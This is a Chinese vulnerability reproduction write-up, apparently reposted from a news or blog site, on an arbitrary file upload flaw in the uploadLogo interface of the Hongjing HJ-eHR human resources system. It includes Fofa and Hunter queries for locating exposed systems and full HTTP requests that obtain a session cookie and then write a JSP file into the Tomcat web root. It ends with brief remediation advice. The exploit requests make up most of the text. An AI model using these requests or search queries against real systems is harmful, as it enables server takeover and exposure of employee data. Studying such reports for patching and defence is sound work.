当前位置: 首页 > news >正文

宏景人力资源信息管理系统 uploadLogo 任意文件上传漏洞复现

0x01 产品描述:

        ‌宏景人力资源信息管理系统‌(HJ-eHR)是一款全面覆盖人力资源管理各模块的软件,旨在帮助企事业单位构建高绩效组织,推动组织健康成长,提升组织软实力。该系统适用于复杂单组织或多组织客户,特别适合集团化管理和跨地域使用。其主要功能包括人员管理、组织机构管理、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,并具备报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用‌。
0x02 漏洞描述:

        宏景人力资源信息管理系统 uploadLogo接口处存在任意文件上传,攻击者可通过该漏洞在上传任意文件至服务器上从而实现远程接管。
0x03 搜索语句:

Fofa:app="HJSOFT-HCM"

Hunter:app.name="宏景 HCM"


0x04 漏洞复现:

首先通过qrcardmain.jsp接口进行有效cookie获取

GET /module/system/qrcard/mobilewrite/qrcardmain.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

通过uploadLogo接口进行上传路径获取

POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Cookie: JSESSIONID=E67ED4895C184595671B3AA69D664C7E
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="path"------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="lfType"0
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif<%= "hello world" %>
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif<%= "hello world" %>
------WebKitFormBoundaryfjKBvGWJbG07Z02r--

在path中写入获取的上传路径

POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Cookie: JSESSIONID=E67ED4895C184595671B3AA69D664C7E
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="path"~2fhome~2fhcm~2fapache~2dtomcat~2d~39~2e~30~2e~36~39~2fwebapps~2fROOT~2ftest1.jsp
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="lfType"0
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif<%= "hello world" %>
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif<%= "hello world" %>
------WebKitFormBoundaryfjKBvGWJbG07Z02r--

拼接路径访问:

http://your-ip:port/test1.jsp


0x05 修复建议:

        首先确保系统限制了文件所必须的上传后缀,然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串,同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。


http://www.mrgr.cn/news/74812.html

相关文章:

  • 《实时流计算系统设计与实现》-Part 2-笔记
  • gitlab角色、权限
  • 前端Vue项目启动报错,出现spawn cmd ENOENT的原因以及解决方案
  • 传奇996_19——常用函数
  • 反向代理模块
  • 深圳华为展厅:30寸OLED透明屏中控桌引领科技新风尚
  • 我要成为算法高手-二分查找篇
  • 【操作系统】Linux之线程同步二(头歌作业)
  • 前端开发设计模式——责任链模式
  • 在Windows上收发PGP加密电子邮件
  • React Hooks 快速入门指南
  • 介绍一下,Stable Diffusion!文生图的稳定之选
  • asp.net framework下webform、webapi和mvc对于文件增加权限校验
  • Leetcode 整数转罗马数字
  • error: unrecognized arguments: --port
  • 新能源汽车关键技术技能大赛理论知识竞赛题库
  • 一文简单了解Android中的input流程
  • ospf排错学习
  • 分清数据链路层、网络层、传输层的区别,以及这些层面的代表协议
  • 计算机文件msvcp100.dll丢失原因以及5种解决方法详解分享
  • macOS系统下使用SQLark连接达梦数据库
  • 探索大型语言模型(LLMs)能否在不泄露私人信息的情况下联合其他大型语言模型共同解决问题
  • 从前端react动画引发到计算机底层的思考
  • 【图像压缩感知】论文阅读:Self-supervised Scalable Deep Compressed Sensing
  • Process finished with exit code 137 (interrupted by signal 9: SIGKILL)
  • 【Bluedroid】A2dp初始化流程源码分析